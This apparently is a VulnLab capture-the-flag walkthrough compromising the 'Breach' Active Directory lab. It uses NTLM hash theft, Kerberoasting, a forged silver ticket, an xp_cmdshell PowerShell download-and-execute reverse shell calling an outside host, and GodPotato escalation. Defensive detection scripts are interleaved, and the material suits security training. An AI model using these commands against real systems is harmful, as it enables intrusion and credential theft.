VL-Breach

Vulnlab Breach: Complete Active Directory Compromise Through NTLM Relay and Silver Ticket Attacks

In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Breach” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous SMB access and NTLM hash capture through social engineering, we’ll progress through Kerberoasting attacks against service accounts, silver ticket generation for privilege escalation, and ultimately achieve SYSTEM-level access via MSSQL exploitation and token impersonation. This penetration test showcases several real-world Active Directory attack vectors including guest account enumeration, NTLM theft techniques, Kerberos service account exploitation, silver ticket forgery, and leveraging impersonation privileges for escalation. The techniques demonstrated highlight common security misconfigurations in Windows environments that penetration testers should look for during enterprise assessments.

Initial Enumeration

NMAP Scan Results

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-17 15:22:18Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.109.252:1433:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
|_ Product_Version: 10.0.20348
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
| smb2-time:
| date: 2025-03-17T15:22:26
|_ start_date: N/A
|_clock-skew: mean: -1h59m59s, deviation: 0s, median: -1h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

User Access

Enumerating Shares

First, let’s check for available SMB shares using the guest account:

netexec smb 10.10.109.252 -u 'guest' -p '' --shares

[Screenshot: Available SMB Shares]

Next, let’s connect to the share named “share” using the guest account:

smbclient //10.10.109.252/share -U 'guest'

[Screenshot: Potential Users]

The share contents revealed several potential usernames:

claire.pope
diana.pope
julia.wong

NTLM Hash Capture

We used ntlm_theft (https://github.com/Greenwolf/ntlm_theft) to create files that, when accessed, would send us the NTLM hash of the user who opened them:

python3 ntlm_theft.py -g all -s <your ip> -f invoice

After creating these files, we connected to the SMB share and uploaded them to all accessible folders:

smbclient //10.10.126.89/share -U 'guest'
mput *

Then we started Responder to capture any callbacks:

sudo responder -I tun0 -dwv

[Screenshot: Julia Wong Hash Capture]

We saved the hash and cracked it using hashcat:

hashcat hash55.txt /usr/share/wordlists/rockyou.txt
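The capture above only works because guest can write callback files into the share. As an added example (not part of the walkthrough), this is the audit a share owner can run to find planted files of that kind: it walks a share and flags any file that embeds a UNC or file:// reference to a host outside an allowlist. The sample share, file names and the 10.8.5.195 host are constructed here.

```python
"""Audit a share directory for files that reference UNC paths on hosts outside
the allowed set, which is what planted NTLM-capture files rely on.
Added example, not from the walkthrough; the sample share is constructed."""
import os
import re
import tempfile

# \\host\... or file://host/...; host may be an IP or a name
UNC_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9.\-_]+)(?=[\\/])")

def find_unc_hosts(data: bytes):
    """Return the set of hosts referenced by UNC/file paths in a file body.
    Also decodes as UTF-16-LE, since .ini/.lnk style files often use it."""
    hosts = set()
    for text in (data.decode("utf-8", "ignore"), data.decode("utf-16-le", "ignore")):
        hosts.update(h.lower() for h in UNC_RE.findall(text))
    return hosts

def audit_share(root: str, allowed_hosts):
    """Walk the share; return [(relative_path, sorted(foreign_hosts))] for
    every file that points at a host not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hosts = find_unc_hosts(fh.read(64 * 1024))  # header region is enough
            foreign = sorted(hosts - allowed)
            if foreign:
                findings.append((os.path.relpath(path, root), foreign))
    return sorted(findings)

def demo():
    """Build a constructed share with one benign and two suspicious files."""
    root = tempfile.mkdtemp(prefix="share_audit_")
    os.makedirs(os.path.join(root, "invoices"))
    samples = {  # constructed contents
        "readme.txt": b"Internal docs live on \\\\breachdc.breach.vl\\share\\docs",
        "invoices/invoice.url": b"[InternetShortcut]\r\nURL=file://10.8.5.195/x\r\n"
                                b"IconFile=\\\\10.8.5.195\\share\\i.ico\r\n",
        "invoices/desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\10.8.5.195\\share\\i.ico\r\n"
                                .encode("utf-16-le"),
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return audit_share(root, allowed_hosts={"breachdc.breach.vl", "breachdc"})
```

Run `demo()` to see both planted files reported with the foreign host; removing guest write access on the share is the fix that makes the audit unnecessary.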

Accessing Julia Wong’s Files

Now that we have Julia Wong’s credentials, we logged back into the share:

smbclient //10.10.126.89/share -U 'julia.wong'

[Screenshot: Local User Flag]

This is where we found the user flag.

Privilege Escalation

BloodHound Enumeration

To get a better understanding of the Active Directory environment, we used BloodHound:

netexec ldap 10.10.126.89 -u 'julia.wong' -p 'Computer1'  --bloodhound --dns-server 10.10.126.89 -c All --dns-tcp

Inside BloodHound, we identified a Kerberoastable service account, SVC_MSSQL@BREACH.VL. We decided to target this account for our lateral movement.

Kerberoasting

We attempted to obtain the service hash:

impacket-GetUserSPNs -dc-ip 10.10.126.89 -request breach.vl/julia.wong:'<PASSWORD>'

Initially, we encountered a clock skew error: KRB_AP_ERR_SKEW(Clock skew too great). To fix this, we synchronized our time with the target system:

sudo timedatectl set-ntp off
sudo rdate -n [IP of Target]

Then we ran GetUserSPNs again and obtained the service ticket hash:

[Screenshot: SQL Service Hash]

We cracked the hash using hashcat:

hashcat hash56.txt /usr/share/wordlists/rockyou.txt

This gave us the password for the MSSQL service account.
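The request above is visible to the domain controller as event 4769 (Kerberos service ticket requested). Kerberoasting tools ask for RC4-encrypted tickets (encryption type 0x17) because those crack far faster than AES, so RC4 service tickets for user-account SPNs are the signal to hunt for. As an added example, not part of the walkthrough, this groups such events by requester; the events, including the svc_backup account, are constructed in the shape of 4769 fields.

```python
"""Flag Kerberoasting from Windows 4769 (TGS request) events: RC4-encrypted
(0x17) service tickets for user-account SPNs, grouped by requester.
Added example, not from the walkthrough; events are constructed."""
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed 4769 events (keys mirror the Windows event data names)
EVENTS = [
    {"EventID": 4769, "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.8.5.195"},
    {"EventID": 4769, "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.8.5.195"},
    {"EventID": 4769, "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.8.5.195"},
    {"EventID": 4769, "TargetUserName": "BREACHDC$@BREACH.VL", "ServiceName": "BREACHDC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::1"},
    {"EventID": 4769, "TargetUserName": "diana.pope@BREACH.VL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.126.50"},
]

def is_roast_candidate(ev):
    """True for an RC4 service ticket for a user-account SPN
    (krbtgt and machine accounts ending in $ are excluded)."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == 4769
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def kerberoast_report(events, threshold=1):
    """Map requester -> sorted services it pulled RC4 tickets for, keeping only
    requesters with at least `threshold` distinct services. A threshold above 1
    suppresses a legacy app that legitimately still uses RC4 for one SPN."""
    by_user = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= threshold}
```

Setting the service account to AES-only (msDS-SupportedEncryptionTypes) removes the RC4 signal and the cheap cracking path at the same time; a long random password on svc_mssql is what would have stopped this step regardless.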

MSSQL Access

We connected to the MSSQL server using the service account:

impacket-mssqlclient svc_mssql:Trustno1@10.10.126.89

We attempted to enable command execution but encountered permission issues:

ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Attack

Since we couldn’t execute commands directly, we decided to create a Silver Ticket:

  1. First, we converted the service account password to an NT hash using an online tool: https://www.browserling.com/tools/ntlm-hash

  2. Next, we needed the domain SID:

     lookupsid.py 'breach.vl/svc_mssql@10.10.126.89' 0
     Domain SID is: S-1-5-21-2330692793-3312915120-706255856

  3. We created the Silver Ticket using ticketer:

     impacket-ticketer -nthash <> -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
     export KRB5CCNAME=administrator.ccache

  4. We used the Silver Ticket to connect to MSSQL as administrator and enable xp_cmdshell:

     impacket-mssqlclient -k breachdc.breach.vl
     enable_xp_cmdshell
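A silver ticket never touches the KDC: the forged service ticket is presented straight to MSSQL, so the DC logs no 4769 for administrator against the MSSQLSvc SPN, while the SQL host still records a Kerberos network logon (4624, logon type 3). As an added example, not part of the walkthrough, this correlates the two event streams and reports Kerberos logons that no ticket grant backs; the timestamps and users are constructed, and the lifetime window assumes the default 10-hour service ticket lifetime.

```python
"""Spot silver-ticket use by correlating Kerberos network logons on the
service host (4624, LogonType 3, AuthenticationPackageName=Kerberos) with
service-ticket grants on the DC (4769). A logon whose user got no ticket for
that service within the ticket lifetime never went through the KDC.
Added example, not from the walkthrough; all events are constructed."""
from datetime import datetime, timedelta

TICKET_LIFETIME = timedelta(hours=10)  # default AD service-ticket lifetime

def t(clock):  # constructed timestamps, all on the same day
    return datetime.fromisoformat(f"2025-03-17T{clock}")

# DC 4769 events: which user was granted a ticket for which service account
TGS_GRANTS = [
    {"time": t("15:20:00"), "user": "julia.wong", "service": "svc_mssql"},
    {"time": t("15:25:00"), "user": "diana.pope", "service": "svc_mssql"},
]
# Service-host 4624 events for the host running MSSQL
LOGONS = [
    {"time": t("15:21:10"), "user": "julia.wong", "logon_type": 3, "auth": "Kerberos"},
    {"time": t("15:30:00"), "user": "administrator", "logon_type": 3, "auth": "Kerberos"},
    {"time": t("15:31:00"), "user": "julia.wong", "logon_type": 3, "auth": "NTLM"},
]

def find_unbacked_logons(logons, tgs_grants, service, lifetime=TICKET_LIFETIME):
    """Return Kerberos network logons with no 4769 grant for (user, service)
    inside the `lifetime` window before the logon. Gaps in DC log forwarding
    produce false positives here, so check collection health before escalating."""
    grants = [g for g in tgs_grants if g["service"].lower() == service.lower()]
    hits = []
    for lg in logons:
        if lg["logon_type"] != 3 or lg["auth"].lower() != "kerberos":
            continue  # NTLM or interactive logons are not ticket-based
        backed = any(g["user"].lower() == lg["user"].lower()
                     and lg["time"] - lifetime <= g["time"] <= lg["time"]
                     for g in grants)
        if not backed:
            hits.append(lg)
    return hits
```

On this box the DC and the SQL host are the same machine, so both streams come from BREACHDC's own Security log; in a split setup the 4769s come from every DC. Rotating the svc_mssql password invalidates the forged ticket, since the NT hash it was signed with is the only secret involved.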

Getting a Reverse Shell

Our initial attempt to get a reverse shell was flagged as malicious:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/Invoke-ConPtyShell.ps1''); Invoke-ConPtyShell 10.8.5.195 3001"';

We found an alternative payload that worked:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/maybe.ps1'')"';

[Screenshot: Initial Shell]

Privilege Escalation to SYSTEM

Impersonation Privileges

Since our shell had impersonation privileges, we used GodPotato (https://github.com/BeichenDream/GodPotato/releases/tag/V1.20) to escalate to SYSTEM:

./God.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command  IEX (New-Object Net.WebClient).DownloadString('http://10.8.5.195:8080/maybe.ps1')"

We modified our maybe.ps1 script and set up a listener:

nc -lvnp 4444

[Screenshot: Admin Shell]

https://api.vulnlab.com/api/v1/share?id=c3140301-21e1-4913-99b2-b635726c0e21